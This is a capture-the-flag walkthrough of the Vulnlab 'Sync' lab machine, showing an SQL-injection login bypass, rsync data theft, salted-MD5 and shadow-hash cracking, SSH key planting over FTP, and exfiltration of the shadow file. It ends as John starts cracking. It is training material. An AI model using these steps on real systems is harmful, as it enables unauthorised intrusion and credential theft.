POSTS

VULNLAB: Sync

Sync is an Easy-rated Linux machine on the Vulnlab platform that focuses on service enumeration and exploiting an insecure Rsync configuration, custom hash cracking, and privilege escalation.

VULNLAB: Sync
3653 words · 18 min

Overview

  • Type Machines
  • OS Linux
  • Severity Easy
  • Creator xct
  • Release date 2023 Apr 25

Enumeration

Start the instance via Discord and let’s go:

image

10.10.123.168

Nmap

$ nmap -sC -sV -Pn -p- --min-rate=1000 -T4 10.10.123.168
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-11 12:47 JST
Nmap scan report for 10.10.123.168
Host is up (0.24s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
21/tcp  open  ftp     vsftpd 3.0.5
22/tcp  open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 d2:f4:57:95:d2:55:04:7a:b1:dc:6f:6c:e9:e2:48:fa (ECDSA)
|_  256 c8:35:08:f7:09:b7:e1:80:bb:d5:c1:77:30:a2:af:fc (ED25519)
80/tcp  open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Login
873/tcp open  rsync   (protocol version 31)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Found vsftpd 3.0.5 and Apache httpd 2.4.52 and rsync (as the machine name is Sync, pretty sure we need to exploit something with rsync)

FTP (21/tcp)

Try to connect anonymously and using default ftp account:

$ ftp anonynous@10.10.123.168
Connected to 10.10.123.168.
220 (vsFTPd 3.0.5)
530 Permission denied.
ftp: Login failed
ftp> quit
221 Goodbye.

$ ftp ftp@10.10.123.168
Connected to 10.10.123.168.
220 (vsFTPd 3.0.5)
530 Permission denied.
ftp: Login failed
ftp> quit
221 Goodbye.

Failed

Web - login bypassing (80/tcp)

image

Following HackTricks - sql login bypass, we can use an SLQi to bypass the login and be authenticated as admin:

We put in the username AND in the password fileds:

' or true--

image

image

image

Not interesting

Rsync - Salted MD5 hash cracking (873/tcp) (triss)

Following HackTricks - 873 pentesting rsync, we can see that the have a read access:

$ nc -vn 10.10.123.168 873
(UNKNOWN) [10.10.123.168] 873 (rsync) open
@RSYNCD: 31.0 sha512 sha256 sha1 md5 md4    <--- You receive this banner with the version from the server
@RSYNCD: 31.0 sha512 sha256 sha1 md5 md4    <--- Then you send the same info
#list                                       <--- Then you ask the sever to list
httpd          	web backup                  <--- The server starts enumerating
@RSYNCD: EXIT                               <--- Sever closes the connection

Enumerate the rsync shared folder httpd:

$ rsync -av --list-only rsync://10.10.123.168/httpd
receiving incremental file list
drwxr-xr-x          4,096 2023/04/21 04:50:04 .
drwxr-xr-x          4,096 2023/04/21 05:13:22 db
-rw-r--r--         12,288 2023/04/21 04:50:42 db/site.db
drwxr-xr-x          4,096 2023/04/21 04:50:50 migrate
drwxr-xr-x          4,096 2023/04/21 05:13:15 www
-rw-r--r--          1,722 2023/04/21 05:02:54 www/dashboard.php
-rw-r--r--          2,315 2023/04/21 05:09:10 www/index.php
-rw-r--r--            101 2023/04/21 05:03:08 www/logout.php

Copy all the files in our attacker machine:

$ rsync -av rsync://10.10.123.168/httpd ./httpd
receiving incremental file list
created directory ./httpd
./
db/
db/site.db
migrate/
www/
www/dashboard.php
www/index.php
www/logout.php

sent 119 bytes  received 16,846 bytes  4,847.14 bytes/sec
total size is 16,426  speedup is 0.97

Found index.php and site.db

Read the index.php:

$ cat httpd/www/index.php                                                          
<?php
session_start();
$secure = "6c4972f3717a5e881e282ad3105de01e";

if (isset($_SESSION['username'])) {
    header('Location: dashboard.php');
    exit();
}

if (isset($_POST['username']) && isset($_POST['password'])) {
    $username = $_POST['username'];
    $password = $_POST['password'];

    $hash = md5("$secure|$username|$password");
    $db = new SQLite3('../db/site.db');
    $result = $db->query("SELECT * FROM users WHERE username = '$username' AND password= '$hash'");
    $row = $result->fetchArray(SQLITE3_ASSOC);
    if ($row) {
        $_SESSION['username'] = $row['username'];
        header('Location: dashboard.php');
        exit();
    } else {
        $error_message = 'Invalid username or password.';
    }
}

?>
<!DOCTYPE html>
<html>
<head>
    <title>Login</title>    
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@3.3.7/dist/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@3.3.7/dist/css/bootstrap-theme.min.css" integrity="sha384-rHyoN1iRsVXV4nD0JutlnGaslCJuC7uwjduW9SVrLvRYooPp2bWYgmgJQIXwl/Sp" crossorigin="anonymous">
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@3.3.7/dist/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
</head>
<body>
    <div class="container">
        <h1 class="mt-5">Login</h1>
        <?php if (isset($error_message)) { ?>
            <div class="alert alert-danger mt-3" role="alert">
                <?php echo $error_message; ?>
            </div>
        <?php } ?>
        <form class="mt-3" method="post">
            <div class="mb-3">
                <label for="username" class="form-label">Username:</label>
                <input type="text" class="form-control" id="username" name="username" required>
            </div>
            <div class="mb-3">
                <label for="password" class="form-label">Password:</label>
                <input type="password" class="form-control" id="password" name="password" required>
            </div>
            <button type="submit" class="btn btn-primary">Login</button>
        </form>
    </div>
</body>
</html>

Interesting stuff:

$secure = "6c4972f3717a5e881e282ad3105de01e";
$hash = md5("$secure|$username|$password");

Read the site.db:

$ file httpd/db/site.db 
httpd/db/site.db: SQLite 3.x database, last written using SQLite version 3037002, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
$ sqlitebrowser httpd/db/site.db 

image

Found 2 hashes:

  • admin : 7658a2741c9df3a97c819584db6e6b3c
  • triss : a0de4d7f81676c3ea9eabcadfd2536f6

As we saw in index.php, it’s a salted md5 hash: md5("$secure|$username|$password").

secure value == 6c4972f3717a5e881e282ad3105de01e username value == triss or admin password value == ???

So we have 2/3 requirements to retrieve the password.

Following the Hashcat wiki with some example, we found the way to make it compatible with the hashcat system:

image

$ cat triss.hash         
a0de4d7f81676c3ea9eabcadfd2536f6:6c4972f3717a5e881e282ad3105de01e|triss|

Then crack it with Hashcat:

$ hashcat -a 0 -m 20 triss.hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou-75.txt 
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-skylake-avx512-AMD Ryzen 9 8945HS w/ Radeon 780M Graphics, 2899/5862 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimim salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache built:
* Filename..: /usr/share/seclists/Passwords/Leaked-Databases/rockyou-75.txt
* Passwords.: 59186
* Bytes.....: 478936
* Keyspace..: 59186
* Runtime...: 0 secs

a0de4d7f81676c3ea9eabcadfd2536f6:6c4972f3717a5e881e282ad3105de01e|triss|:gerald
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 20 (md5($salt.$pass))
Hash.Target......: a0de4d7f81676c3ea9eabcadfd2536f6:6c4972f3717a5e881e...triss|
Time.Started.....: Sat Jan 11 14:30:40 2025 (0 secs)
Time.Estimated...: Sat Jan 11 14:30:40 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou-75.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1293.4 kH/s (0.16ms) @ Accel:512 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2048/59186 (3.46%)
Rejected.........: 0/2048 (0.00%)
Restore.Point....: 0/59186 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> steve
Hardware.Mon.#1..: Util: 24%

Started: Sat Jan 11 14:30:32 2025
Stopped: Sat Jan 11 14:30:42 2025

Found triss:gerald

Try also for admin but can`t crack it.

Another possibility is also to create a python script saltedmd5hash_crack.py to crack it:

import hashlib

triss_username = "triss"
admin_username = "admin"
secure = "6c4972f3717a5e881e282ad3105de01e"

triss_target = "a0de4d7f81676c3ea9eabcadfd2536f6"
admin_target = "7658a2741c9df3a97c819584db6e6b3c"

with open('/usr/share/wordlists/rockyou.txt','r', encoding="ISO-8859-1") as f:

    for line in f:
        line = line.rstrip('\n')
        hash_str = f"{secure}|{triss_username}|{line}"
        hash_obj = hashlib.md5(hash_str.encode("ISO-8859-1"))
        hash = hash_obj.hexdigest()
        if hash == triss_target:
            print("triss:" + line)

        hash_str = f"{secure}|{admin_username}|{line}"
        hash_obj = hashlib.md5(hash_str.encode("ISO-8859-1"))
        hash = hash_obj.hexdigest()
        if hash == admin_target:
            print("admin:" + line)
$ python3 ./saltedmd5hash_crack.py                                      
triss:gerald

Try to use it to login via SSH:

$ sshpass -p 'gerald' ssh triss@10.10.123.168 -oStrictHostKeyChecking=accept-new -oStrictHostKeyChecking=no
Warning: Permanently added '10.10.123.168' (ED25519) to the list of known hosts.
triss@10.10.123.168: Permission denied (publickey).

Failed as preshared key is required

FTP abusing (ssh 4 triss)

We can connect via FTP using triss credentials:

$ ftp -i triss@10.10.123.168
Connected to 10.10.123.168.
220 (vsFTPd 3.0.5)
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||40302|)
150 Here comes the directory listing.
drwxr-x---    2 1003     1003         4096 Apr 21  2023 .
drwxr-x---    2 1003     1003         4096 Apr 21  2023 ..
lrwxrwxrwx    1 0        0               9 Apr 21  2023 .bash_history -> /dev/null
-rw-r--r--    1 1003     1003          220 Apr 19  2023 .bash_logout
-rw-r--r--    1 1003     1003         3771 Apr 19  2023 .bashrc
-rw-r--r--    1 1003     1003          807 Apr 19  2023 .profile
226 Directory send OK.

We are under the home directory of triss

Generate a new public/private ed25519 key pair (without password):

$ ssh-keygen -t ed25519

Create a new authorized_keys including our new public key:

$ cp ~/.ssh/id_ed25519.pub ./authorized_keys

Upload it to our target:

ftp> mkdir .ssh
257 "/.ssh" created
ftp> cd .ssh
250 Directory successfully changed.
ftp> put authorized_keys
local: authorized_keys remote: authorized_keys
229 Entering Extended Passive Mode (|||10144|)
150 Ok to send data.
100% |*****************************************************************************************************|    96        1.47 MiB/s    00:00 ETA
226 Transfer complete.
96 bytes sent in 00:00 (0.19 KiB/s)
ftp> ls -la
229 Entering Extended Passive Mode (|||8731|)
150 Here comes the directory listing.
drwx------    2 1003     1003         4096 Jan 11 06:02 .
drwxr-x---    3 1003     1003         4096 Jan 11 05:53 ..
-rw-------    1 1003     1003           96 Jan 11 06:02 authorized_keys
226 Directory send OK.

Now we connect via SSH:

$ ssh -i ~/.ssh/id_ed25519 triss@10.10.123.168 -oStrictHostKeyChecking=accept-new -oStrictHostKeyChecking=no 
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.19.0-1023-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Jan 11 06:04:04 UTC 2025

  System load:  0.0               Processes:             105
  Usage of /:   28.0% of 7.57GB   Users logged in:       0
  Memory usage: 24%               IPv4 address for eth0: 10.10.123.168
  Swap usage:   0%

 * Ubuntu Pro delivers the most comprehensive open source security and
   compliance features.

   https://ubuntu.com/aws/pro

 * Introducing Expanded Security Maintenance for Applications.
   Receive updates to over 25,000 software packages with your
   Ubuntu Pro subscription. Free for personal use.

     https://ubuntu.com/pro

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

triss@ip-10-10-200-238:~$ 
triss@ip-10-10-200-238:~$ pwd
/home/triss
triss@ip-10-10-200-238:~$ ls -la
total 28
drwxr-x--- 4 triss triss 4096 Jan 11 06:04 .
drwxr-xr-x 7 root  root  4096 Apr 19  2023 ..
lrwxrwxrwx 1 root  root     9 Apr 21  2023 .bash_history -> /dev/null
-rw-r--r-- 1 triss triss  220 Apr 19  2023 .bash_logout
-rw-r--r-- 1 triss triss 3771 Apr 19  2023 .bashrc
drwx------ 2 triss triss 4096 Jan 11 06:04 .cache
-rw-r--r-- 1 triss triss  807 Apr 19  2023 .profile
drwx------ 2 triss triss 4096 Jan 11 06:02 .ssh

No flag

Enumerate existing users:

triss@ip-10-10-200-238:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:102:105::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:103:106:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
syslog:x:104:111::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:112:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:113::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:114::/nonexistent:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
landscape:x:111:116::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:117:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
ec2-instance-connect:x:113:65534::/nonexistent:/usr/sbin/nologin
_chrony:x:114:121:Chrony daemon,,,:/var/lib/chrony:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
sa:x:1001:1001:,,,:/home/sa:/bin/bash
httpd:x:1002:1002:,,,:/home/httpd:/bin/bash
triss:x:1003:1003:,,,:/home/triss:/bin/bash
ftp:x:115:123:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
jennifer:x:1004:1004:,,,:/home/jennifer:/bin/bash

triss@ip-10-10-200-238:~$ ls /home
httpd  jennifer  sa  triss  ubuntu

Seems the next step is to escalate to jennifer

Password reusing (jennifer) (Sync_User)

Check the SUDO privileges:

triss@ip-10-10-200-238:~$ sudo -l
[sudo] password for triss: 
Sorry, user triss may not run sudo on ip-10-10-200-238.

Nada…

Check if we can escalate to jennifer using the same password than triss:

triss@ip-10-10-200-238:~$ su jennifer
Password: 
jennifer@ip-10-10-200-238:/home/triss$ id
uid=1004(jennifer) gid=1004(jennifer) groups=1004(jennifer)

OMG that works (>.<)

Grab the flag Sync_User:

jennifer@ip-10-10-200-238:/home/triss$ cd /home/
jennifer@ip-10-10-200-238:/home$ ls jennifer/
user.txt
jennifer@ip-10-10-200-238:/home$ cat jennifer/user.txt 
VL{bcf845cf94864fbba7e016d9fcd3a2db}

Shadow cracking (sa)

jennifer@ip-10-10-200-238:/home$ sudo -l
[sudo] password for jennifer: 
Sorry, user jennifer may not run sudo on ip-10-10-200-238.

まったく何もない.

Enumerate again:

jennifer@ip-10-10-200-238:/home$ cd /
jennifer@ip-10-10-200-238:/$ ls -la
total 76
drwxr-xr-x  20 root root  4096 Jan 11 01:01 .
drwxr-xr-x  20 root root  4096 Jan 11 01:01 ..
drwxr-xr-x   2 root root  4096 Jan 11 06:14 backup
lrwxrwxrwx   1 root root     7 Mar 25  2023 bin -> usr/bin
drwxr-xr-x   4 root root  4096 Apr 19  2023 boot
drwxr-xr-x  15 root root  3180 Jan 11 01:01 dev
drwxr-xr-x  96 root root  4096 Jan 11 01:01 etc
drwxr-xr-x   7 root root  4096 Apr 19  2023 home
lrwxrwxrwx   1 root root     7 Mar 25  2023 lib -> usr/lib
lrwxrwxrwx   1 root root     9 Mar 25  2023 lib32 -> usr/lib32
lrwxrwxrwx   1 root root     9 Mar 25  2023 lib64 -> usr/lib64
lrwxrwxrwx   1 root root    10 Mar 25  2023 libx32 -> usr/libx32
drwx------   2 root root 16384 Mar 25  2023 lost+found
drwxr-xr-x   2 root root  4096 Mar 25  2023 media
drwxr-xr-x   2 root root  4096 Mar 25  2023 mnt
drwxr-xr-x   3 root root  4096 Apr 19  2023 opt
dr-xr-xr-x 166 root root     0 Jan 11 01:01 proc
drwx------   6 root root  4096 Apr 21  2023 root
drwxr-xr-x  28 root root   920 Jan 11 06:04 run
lrwxrwxrwx   1 root root     8 Mar 25  2023 sbin -> usr/sbin
drwxr-xr-x   8 root root  4096 Mar 25  2023 snap
drwxr-xr-x   3 root root  4096 Apr 19  2023 srv
dr-xr-xr-x  13 root root     0 Jan 11 01:01 sys
drwxrwxrwt  12 root root  4096 Jan 11 06:14 tmp
drwxr-xr-x  14 root root  4096 Mar 25  2023 usr
drwxr-xr-x  14 root root  4096 Apr 20  2023 var
jennifer@ip-10-10-200-238:/$ ls -la backup/
total 1272
drwxr-xr-x  2 root root 4096 Jan 11 06:16 .
drwxr-xr-x 20 root root 4096 Jan 11 01:01 ..
-rw-r--r--  1 root root 5899 Jan 11 01:02 1736557321.zip
-rw-r--r--  1 root root 5899 Jan 11 01:04 1736557441.zip
-rw-r--r--  1 root root 5899 Jan 11 01:06 1736557561.zip
-rw-r--r--  1 root root 5899 Jan 11 01:08 1736557681.zip
-rw-r--r--  1 root root 5899 Jan 11 01:10 1736557801.zip
-rw-r--r--  1 root root 5899 Jan 11 01:12 1736557921.zip
-rw-r--r--  1 root root 5899 Jan 11 01:14 1736558041.zip
...
-rw-r--r--  1 root root 5899 Jan 11 06:10 1736575801.zip
-rw-r--r--  1 root root 5899 Jan 11 06:12 1736575921.zip
-rw-r--r--  1 root root 5899 Jan 11 06:14 1736576041.zip
-rw-r--r--  1 root root 5899 Jan 11 06:16 1736576161.zip

Copy all to /dev/shm:

jennifer@ip-10-10-200-238:/$ cd /dev/shm/
jennifer@ip-10-10-200-238:/dev/shm$ ls
jennifer@ip-10-10-200-238:/dev/shm$ cp -R /backup .
jennifer@ip-10-10-200-238:/dev/shm$ cd backup/
jennifer@ip-10-10-200-238:/dev/shm/backup$ 

View list of files without extraction:

jennifer@ip-10-10-200-238:/dev/shm/backup$ unzip -l \*.zip
Archive:  1736577241.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
        0  2025-01-11 06:34   tmp/backup/
      430  2025-01-11 06:34   tmp/backup/rsyncd.conf
        0  2025-01-11 06:34   tmp/backup/httpd/
        0  2025-01-11 06:34   tmp/backup/httpd/www/
     1722  2025-01-11 06:34   tmp/backup/httpd/www/dashboard.php
      101  2025-01-11 06:34   tmp/backup/httpd/www/logout.php
     2315  2025-01-11 06:34   tmp/backup/httpd/www/index.php
        0  2025-01-11 06:34   tmp/backup/httpd/migrate/
        0  2025-01-11 06:34   tmp/backup/httpd/db/
    12288  2025-01-11 06:34   tmp/backup/httpd/db/site.db
     2131  2025-01-11 06:34   tmp/backup/passwd
     1487  2025-01-11 06:34   tmp/backup/shadow
---------                     -------
    20474                     12 files

Archive:  1736577121.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
        0  2025-01-11 06:32   tmp/backup/
     5899  2025-01-11 06:31   tmp/backup/1736567281.zip
     5899  2025-01-11 06:31   tmp/backup/1736563801.zip
     5899  2025-01-11 06:31   tmp/backup/1736560801.zip
     5899  2025-01-11 06:31   tmp/backup/1736575321.zip
     5899  2025-01-11 06:31   tmp/backup/1736562481.zip
     5899  2025-01-11 06:31   tmp/backup/1736565601.zip
     5899  2025-01-11 06:31   tmp/backup/1736574601.zip
     5899  2025-01-11 06:31   tmp/backup/1736559361.zip
     5899  2025-01-11 06:31   tmp/backup/1736564521.zip
     5899  2025-01-11 06:31   tmp/backup/1736561521.zip
     5899  2025-01-11 06:31   tmp/backup/1736567641.zip
     5899  2025-01-11 06:31   tmp/backup/1736562121.zip
     5899  2025-01-11 06:31   tmp/backup/1736573881.zip
     5899  2025-01-11 06:31   tmp/backup/1736569801.zip
     5899  2025-01-11 06:31   tmp/backup/1736575801.zip
     5899  2025-01-11 06:31   tmp/backup/1736560201.zip
     5899  2025-01-11 06:31   tmp/backup/1736573401.zip
     5899  2025-01-11 06:31   tmp/backup/1736573641.zip
     5899  2025-01-11 06:31   tmp/backup/1736565481.zip
     5899  2025-01-11 06:31   tmp/backup/1736576041.zip
     5899  2025-01-11 06:31   tmp/backup/1736577001.zip
     5899  2025-01-11 06:31   tmp/backup/1736575441.zip
     5899  2025-01-11 06:31   tmp/backup/1736568121.zip
     5899  2025-01-11 06:31   tmp/backup/1736570401.zip
     5899  2025-01-11 06:31   tmp/backup/1736571961.zip
   996450  2025-01-11 06:31   tmp/backup/1736576881.zip
     5899  2025-01-11 06:31   tmp/backup/1736558521.zip
     5899  2025-01-11 06:31   tmp/backup/1736572081.zip
     5899  2025-01-11 06:31   tmp/backup/1736569921.zip
     5899  2025-01-11 06:31   tmp/backup/1736560681.zip
     5899  2025-01-11 06:31   tmp/backup/1736567761.zip
     5899  2025-01-11 06:31   tmp/backup/1736573281.zip
...

Seems 1736576881.zip has the biggest size

Extract it and check:

jennifer@ip-10-10-200-238:/dev/shm/backup$ unzip 1736576881.zip
Archive:  1736576881.zip
   creating: tmp/backup/
 extracting: tmp/backup/1736567281.zip  
 extracting: tmp/backup/1736563801.zip  
 extracting: tmp/backup/1736560801.zip  
 extracting: tmp/backup/1736575321.zip  
 extracting: tmp/backup/1736562481.zip  
 extracting: tmp/backup/1736565601.zip  
 extracting: tmp/backup/1736574601.zip  
 extracting: tmp/backup/1736559361.zip  
 extracting: tmp/backup/1736564521.zip  
...
jennifer@ip-10-10-200-238:/dev/shm/backup$ cd tmp/backup/
jennifer@ip-10-10-200-238:/dev/shm/backup/tmp/backup$ ls
1736557321.zip  1736559601.zip  1736561881.zip  1736564161.zip  1736566441.zip  1736568721.zip  1736571001.zip  1736573281.zip  1736575561.zip
1736557441.zip  1736559721.zip  1736562001.zip  1736564281.zip  1736566562.zip  1736568841.zip  1736571121.zip  1736573401.zip  1736575681.zip
1736557561.zip  1736559841.zip  1736562121.zip  1736564401.zip  1736566681.zip  1736568961.zip  1736571241.zip  1736573521.zip  1736575801.zip
1736557681.zip  1736559961.zip  1736562241.zip  1736564521.zip  1736566801.zip  1736569081.zip  1736571361.zip  1736573641.zip  1736575921.zip
1736557801.zip  1736560082.zip  1736562361.zip  1736564641.zip  1736566921.zip  1736569201.zip  1736571481.zip  1736573761.zip  1736576041.zip
1736557921.zip  1736560201.zip  1736562481.zip  1736564761.zip  1736567041.zip  1736569321.zip  1736571601.zip  1736573881.zip  1736576161.zip
1736558041.zip  1736560321.zip  1736562601.zip  1736564881.zip  1736567161.zip  1736569441.zip  1736571721.zip  1736574001.zip  1736576281.zip
1736558161.zip  1736560441.zip  1736562721.zip  1736565001.zip  1736567281.zip  1736569561.zip  1736571841.zip  1736574121.zip  1736576401.zip
1736558281.zip  1736560561.zip  1736562841.zip  1736565121.zip  1736567401.zip  1736569681.zip  1736571961.zip  1736574241.zip  1736576521.zip
1736558401.zip  1736560681.zip  1736562961.zip  1736565241.zip  1736567521.zip  1736569801.zip  1736572081.zip  1736574361.zip  1736576641.zip
1736558521.zip  1736560801.zip  1736563081.zip  1736565361.zip  1736567641.zip  1736569921.zip  1736572201.zip  1736574481.zip  1736576761.zip
1736558641.zip  1736560921.zip  1736563201.zip  1736565481.zip  1736567761.zip  1736570041.zip  1736572321.zip  1736574601.zip  httpd
1736558761.zip  1736561041.zip  1736563321.zip  1736565601.zip  1736567881.zip  1736570161.zip  1736572441.zip  1736574721.zip  passwd
1736558881.zip  1736561161.zip  1736563441.zip  1736565721.zip  1736568001.zip  1736570281.zip  1736572561.zip  1736574841.zip  rsyncd.conf
1736559001.zip  1736561281.zip  1736563561.zip  1736565841.zip  1736568121.zip  1736570401.zip  1736572681.zip  1736574961.zip  shadow
1736559121.zip  1736561401.zip  1736563681.zip  1736565961.zip  1736568241.zip  1736570521.zip  1736572801.zip  1736575081.zip
1736559241.zip  1736561521.zip  1736563801.zip  1736566081.zip  1736568361.zip  1736570641.zip  1736572921.zip  1736575201.zip
1736559361.zip  1736561641.zip  1736563921.zip  1736566201.zip  1736568481.zip  1736570761.zip  1736573041.zip  1736575321.zip
1736559481.zip  1736561761.zip  1736564041.zip  1736566321.zip  1736568601.zip  1736570881.zip  1736573162.zip  1736575441.zip

Found shadow

jennifer@ip-10-10-200-238:/dev/shm/backup/tmp/backup$ cat shadow 
root:$y$j9T$Lvn5CBDJCop7JR9iMerFr1$dfzHPNhyy1jkree7XtvuxhyYziUbVC.W5ltk7CTFJKA:19466:0:99999:7:::
daemon:*:19441:0:99999:7:::
bin:*:19441:0:99999:7:::
sys:*:19441:0:99999:7:::
sync:*:19441:0:99999:7:::
games:*:19441:0:99999:7:::
man:*:19441:0:99999:7:::
lp:*:19441:0:99999:7:::
mail:*:19441:0:99999:7:::
news:*:19441:0:99999:7:::
uucp:*:19441:0:99999:7:::
proxy:*:19441:0:99999:7:::
www-data:*:19441:0:99999:7:::
backup:*:19441:0:99999:7:::
list:*:19441:0:99999:7:::
irc:*:19441:0:99999:7:::
gnats:*:19441:0:99999:7:::
nobody:*:19441:0:99999:7:::
systemd-network:*:19441:0:99999:7:::
systemd-resolve:*:19441:0:99999:7:::
messagebus:*:19441:0:99999:7:::
systemd-timesync:*:19441:0:99999:7:::
syslog:*:19441:0:99999:7:::
_apt:*:19441:0:99999:7:::
tss:*:19441:0:99999:7:::
uuidd:*:19441:0:99999:7:::
tcpdump:*:19441:0:99999:7:::
sshd:*:19441:0:99999:7:::
pollinate:*:19441:0:99999:7:::
landscape:*:19441:0:99999:7:::
fwupd-refresh:*:19441:0:99999:7:::
ec2-instance-connect:!:19441:0:99999:7:::
_chrony:*:19441:0:99999:7:::
ubuntu:!:19466:0:99999:7:::
lxd:!:19466::::::
sa:$y$j9T$jJFOBCaiGJUmyZZRFn5aG1$7pSWDUlnIOlXInoK4nn3gCEIiMp94x8sXaV.DtTzM6D:19468:0:99999:7:::
httpd:$y$j9T$88wPEXTVd61aOFzWkEMEP1$LJwwm3kqnGIDD4pvfFPqgfC/w15F8N2VdLChRDI7GX5:19466:0:99999:7:::
triss:$y$j9T$cJzLWCatbO1.azxJo6eQN1$I4BAX3vXEOlfg4v/q5tIibnVNR61C6V4QFQEI/Y1pD4:19466:0:99999:7:::
ftp:*:19466:0:99999:7:::
jennifer:$y$j9T$DBxmxcNWJlhvgfWCUTbEC0$98T55fRnXftC4XaKZdDJ6IMPsqXP1fA6QVAioJ3CZo7:19466:0:99999:7:::

Set a web server into the jeniffer’s session:

jennifer@ip-10-10-200-238:/dev/shm/backup/tmp/backup$ python3 -m http.server 8001
Serving HTTP on 0.0.0.0 port 8001 (http://0.0.0.0:8001/) ...

Download both, passwd and shadow files to our attacker machine:

$ wget http://10.10.123.168:8001/shadow
$ wget http://10.10.123.168:8001/passwd 

Then crack it with JohnTheRipper:

$ john --format=crypt --wordlist=/usr/share/wordlists/rockyou.txt shadow 
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (crypt, generic crypt(3) [?/64])
Cost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 0 for all loaded hashes
